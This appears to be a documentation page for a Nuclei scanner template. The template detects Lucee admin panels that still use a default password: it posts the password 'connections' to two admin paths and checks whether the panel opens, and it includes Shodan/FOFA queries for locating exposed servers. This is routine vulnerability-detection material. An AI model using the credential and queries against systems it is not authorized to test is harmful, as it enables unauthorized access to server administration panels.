Lucee - Default Login
ID: lucee-default-login
Severity: high
Author: jpg0mez
Tags: lucee,default-login
Description
Section titled “Description”Lucee admin panel using the default login password was discovered.
YAML Source
Section titled “YAML Source”id: lucee-default-login
info: name: Lucee - Default Login author: jpg0mez severity: high description: | Lucee admin panel using the default login password was discovered. reference: - https://support.intranetconnections.com/hc/en-us/articles/115012060627-Lucee-Configuration classification: cwe-id: CWE-1392 metadata: verified: true max-request: 1 shodan-query: "html:\"Lucee\"" fofa-query: "app=\"Lucee-Engine\"" tags: lucee,default-login
http: - raw: - | POST {{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
login_passwordweb={{password}}&lang=en&rememberMe=s&submit=submit
attack: pitchfork payloads: path: - /lucee/admin/web.cfm - /lucee/admin/server.cfm password: - "connections"
stop-at-first-match: true matchers: - type: dsl dsl: - 'contains(body, "Overview - Lucee Web Administrator")' - '!contains(body, "Access is protected")' - 'status_code == 200' condition: and# digest: 4a0a00473045022100ca6eb5411ae954aaa6828103c7f0db46b40be916ee98e42c7f3c2f853ef80bbe0220545e042dbfa4c2c1c223bcb54554657560ee433e2c31a7393a5b3036f35350be:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/default-logins/lucee/lucee-default-login.yaml"